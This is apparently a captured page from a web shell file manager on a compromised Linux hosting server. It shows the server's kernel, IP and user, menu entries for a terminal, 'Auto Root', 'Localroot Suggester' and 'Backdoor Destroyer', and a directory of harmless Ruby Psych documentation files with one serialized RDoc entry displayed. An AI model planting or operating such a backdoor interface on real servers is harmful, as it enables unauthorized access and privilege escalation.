Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.217.103
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby32 /
share /
ri /
system /
Psych /
Handler /
Delete
Unzip
Name
Size
Permission
Date
Action
DumperOptions
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
alias-i.ri
770
B
-rw-r--r--
2026-04-07 17:42
cdesc-Handler.ri
1.6
KB
-rw-r--r--
2026-04-07 17:42
empty-i.ri
372
B
-rw-r--r--
2026-04-07 17:42
end_document-i.ri
792
B
-rw-r--r--
2026-04-07 17:42
end_mapping-i.ri
323
B
-rw-r--r--
2026-04-07 17:42
end_sequence-i.ri
331
B
-rw-r--r--
2026-04-07 17:42
end_stream-i.ri
331
B
-rw-r--r--
2026-04-07 17:42
event_location-i.ri
407
B
-rw-r--r--
2026-04-07 17:42
scalar-i.ri
1.66
KB
-rw-r--r--
2026-04-07 17:42
start_document-i.ri
1.17
KB
-rw-r--r--
2026-04-07 17:42
start_mapping-i.ri
1.5
KB
-rw-r--r--
2026-04-07 17:42
start_sequence-i.ri
1.49
KB
-rw-r--r--
2026-04-07 17:42
start_stream-i.ri
566
B
-rw-r--r--
2026-04-07 17:42
streaming%3f-i.ri
335
B
-rw-r--r--
2026-04-07 17:42
Save
Rename
U:RDoc::AnyMethod[iI"scalar:ETI"Psych::Handler#scalar;TF:privateo:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"DCalled when a scalar +value+ is found. The scalar may have an ;TI"D+anchor+, a +tag+, be implicitly +plain+ or implicitly +quoted+;To:RDoc::Markup::BlankLine o; ; [I"/+value+ is the string value of the scalar ;TI"-+anchor+ is an associated anchor or nil ;TI"'+tag+ is an associated tag or nil ;TI" +plain+ is a boolean value ;TI"!+quoted+ is a boolean value ;TI"6+style+ is an integer indicating the string style;T@o; ; [I"JSee the constants in Psych::Nodes::Scalar for the possible values of ;TI"+style+;T@S:RDoc::Markup::Heading: leveli: textI"Example;T@o; ; [I"KHere is a YAML document that exercises most of the possible ways this ;TI"method can be called:;T@o:RDoc::Markup::Verbatim; [ I" --- ;TI"- !str "foo" ;TI"- &anchor fun ;TI"- many ;TI" lines ;TI" - | ;TI" many ;TI" newlines ;T:@format0o; ; [I"JThe above YAML document contains a list with four strings. Here are ;TI":the parameters sent to this method in the same order:;T@o;; [ I"C# value anchor tag plain quoted style ;TI"D["foo", nil, "!str", false, false, 3 ] ;TI"D["fun", "anchor", nil, true, false, 1 ] ;TI"D["many lines", nil, nil, true, false, 1 ] ;TI"C["many\nnewlines\n", nil, nil, false, true, 4 ];T;0: @fileI"#ext/psych/lib/psych/handler.rb;T:0@omit_headings_from_table_of_contents_below000[ I"/(value, anchor, tag, plain, quoted, style);T@7FI"Handler;TcRDoc::NormalClass00